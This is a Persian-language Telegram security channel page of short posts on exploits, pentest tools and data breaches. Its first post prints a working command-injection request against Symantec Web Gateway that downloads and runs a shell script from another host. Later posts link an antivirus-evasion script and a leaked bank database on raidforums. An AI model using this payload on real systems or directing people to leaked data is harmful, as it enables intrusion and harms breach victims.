امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
آسیب پذیری اجرای دستور از راه دور در سرویس Symantec Web Gateway نسخه ی 5.0.2.8

[PoC]
POST /spywall/timeConfig.php HTTP/1.1

posttime=1585228657&saveForm=Save&timesync=1&ntpserver=https://qweqwe.com;$(wget%20https://192.168.1.
170/a.sh%20-O%20/tmp/a.sh;sh%20/tmp/a.sh);#&timezone=5


https://packetstormsecurity.com/files/157163/Symantec-Web-Gateway-5.0.2.8-Remote-Code-Execution.html




#symantec
#exploit
#rce


@sec_nerd
xencrypt


اسکریپت پاورشل برای دور زدن آنتی ویروس ها

https://hakin9.org/xencrypt-a-powershell-script-anti-virus-evasion-tool/


#windows
#ps
#bypass


@sec_nerd
بانک ملی افغانستان هم هک شد

دیتابیس این بانک که حجم بسیار اندکی دارد بصورت رایگان در raidforums قرار گرفت


https://raidforums.com/Thread-Bank-Meli-Afghan-Full-Database-bma-com-af


#breach
#afghanistan


@sec_nerd
تلفیق سه آسیب پذیری برای بدست آوردن RCE در Microsoft AttackSurfaceAnalyzer


https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/


#windows
#privesc


@sec_nerd
تکنیک های معمول در حملات XXE و SSRF

تست کیس های این دو حمله:
https://blog.aisecureme.com/application-security-test-cases-for-xxe-ssrf/


#xxe
#ssrf


@sec_nerd
دیتابیس اپلیکیشن MCA Wizard که یک سرویس پرکاربر وام های کوتاه مدت و مدیریت اعتبارات شرکتهای کوچک است به سرقت رفت.
این دیتابیس حدود ۵۰۰ هزار رکورد دارد که اطلاعات مالی، مالیات، کپی های اسناد بانکی، گواهینامه ی رانندگی،کدملی و جزییات دیگری را در خود دارد که برای سارقان اینترنتی بسیار کاربردی است.

این دیتابیس بر روی یک باکت محافظت نشده ی آمازون قرار داشت.

https://securityboulevard.com/2020/04/breacher-feature-mca-wizard/


#breach
#news


@sec_nerd
ابزار کشف آسیب پذیری هایی از نوع DOM Based XSS


https://github.com/dwisiswant0/findom-xss


#xss
#pentest

@sec_nerd
👍1
یک هکر ناشناس دسترسی به شبکه ی بانکی یک بانک اوکراینی را با مبلغ 1.5 بیت کوین به فروش گذاشته است

این دسترسی شامل اکتیودایرکتوری، سیستم سوئیفت و دیتابیس اوراکل می باشد.

https://twitter.com/Bank_Security/status/1249266517285441537


#breach
#ukrain


@sec_nerd
یک سناریوی جالب از کشف آسیب پذیری RCE بر روی ساب دامین یک شرکت

#bugbounty
#rce
#pentest
#shodan


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
کاهش دهنده ی استرس!

مخصوص دوستانی که duplicate میخورن 😂😂

amzn.to/3chSGcN


#fun
#bugbounty

@sec_nerd
مشخصات بیش از یک میلیون و چهارصد هزار پزشک امریکایی در raidforums به فروش گذاشته شد

این اطلاعات حاوی نام، آدرس،ایمیل،شماره تلفن و حساب لینکدین است.

به نظر میرسد دیتای مذکور از api وبسایت findadoctor.com بدست آمده باشد.



#breach
#usa

@sec_nerd
چک لیست بررسی سرویس SMB در لینوکس و ویندوز


#smb
#windows
#linux
#enum


@sec_nerd